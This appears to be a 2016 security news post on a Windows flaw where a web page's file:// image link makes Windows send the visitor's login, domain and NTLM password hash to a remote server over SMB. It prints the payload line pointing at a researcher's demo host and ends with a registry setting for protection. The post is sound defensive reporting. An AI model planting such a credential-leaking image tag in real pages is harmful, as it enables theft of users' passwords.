4 August 2016

Russian researcher ValdikSS made publicly available a little exploit, which can steal your Windows credentials (login and NTML hash) just by visiting a website. The issue is connected with the way Windows operating system treats file:// URIs. Once spotted, the operating system will send SMB NTLMSSP_NEGOTIATE request to attacker's server, revealing login, domain name and NTLM hash of your password.

Web page with fully working exploit is available here: hxxp://witch.valdikss.org.ru/

Do not visit this page from your corporate computer, as your password might be decrypted.

The page contains an image <img src=”file://witch.valdikss.org.ru/a”>, which triggers SMB negotiations.

Below is a screenshot for a stand-alone workstation:

As you can see from the screenshot, a simple password can be recovered from NTLM hash within several seconds. The collected hashes with strong passwords can be stored and decrypted later.

The exploit works on all modern operating Windows systems, including Windows 10. And it does not matter, which browser you use, as the request is handled by operating system.

The same rule applies for integrated Microsoft account. If you use your Microsoft account to login to your PC, then attackers can steal it too. In this case they might be able to access all Microsoft services, using Live ID, e.g. Skype, OneDrive, etc.

Protection

Use RestrictReceivingNTLMTraffic registry key to disable this behavior.

Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0] "RestrictReceivingNTLMTraffic"=dword:00000002 "RestrictSendingNTLMTraffic"=dword:00000002